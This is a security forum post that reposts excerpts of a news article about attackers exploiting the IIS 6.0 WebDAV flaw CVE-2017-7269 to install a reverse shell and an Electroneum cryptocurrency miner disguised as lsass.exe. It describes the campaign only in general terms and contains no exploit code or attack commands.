Windows Servers Targeted for Cryptocurrency Mining via IIS Flaw

Faybert

Faybert

Level 24
Thread author
Verified
Top Poster
Well-known
Jan 8, 2017
1,318
Content source
https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/
Hackers are leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mines the Electroneum cryptocurrency.

Attacks aren't widespread, as they target a quite old IIS version, but they are happening at scale.
Hackers using former IIS 6.0 zero-day

Hackers are using CVE–2017–7269 to take over servers. This is a vulnerability discovered by two Chinese researchers in March 2017 that affects IIS' WebDAV service. At the time it was discovered last year, the flaw was a zero-day, being under heavy exploitation for almost nine months, since June 2016.

Microsoft initially said it was not planning to fix the flaw because IIS 6.0 was end-of-life, and so were the operating systems that shipped with IIS 6.0 by default —Windows XP and Windows Server 2003.
.....
.....
Click to expand...
Hackers using CVE-2017-7269 to install Electroneum miner

Now, F5 Labs says it found another hacker group using the same exploit, but deploying an Electroneum miner instead of Monero.

According to experts, the threat actor uses CVE–2017–7269 to deliver an ASCII shellcode which contains a Return-Oriented Programming (ROP) exploit chain that installs a reverse shell on vulnerable hosts.

Attackers then use the reverse shell to download the miner and start the mining process. The infection process is masked by the use of the Squiblydoo technique and by disguising the miner as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.

F5 experts said the Electroneum address they found in attacks stored only $99, suggesting they either caught the campaign at its beginning, or crooks are rotating address IDs to avoid researchers from tracking their entire operation.
........
........
Click to expand...
 
  • Like
Reactions: Mariihh and harlan4096
You must log in or register to reply here.

Similar threads

silversurfer
    • Like
    • +Reputation
    • Applause
New shc-based Linux Malware Targeting Systems with Cryptocurrency Miner
Replies
0
Views
595
News Archive
silversurfer
silversurfer
Gandalf_The_Grey
    • Like
    • Thanks
Update iTunes on Windows Now to Fix a Security Flaw
Replies
0
Views
1,144
News Archive
Gandalf_The_Grey
Gandalf_The_Grey
upnorth
    • Like
    • Thanks
    • +Reputation
VMware Bug with 9.8 Severity Exploited to install Witch’s Brew of Malware
Replies
0
Views
436
News Archive
upnorth
upnorth

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top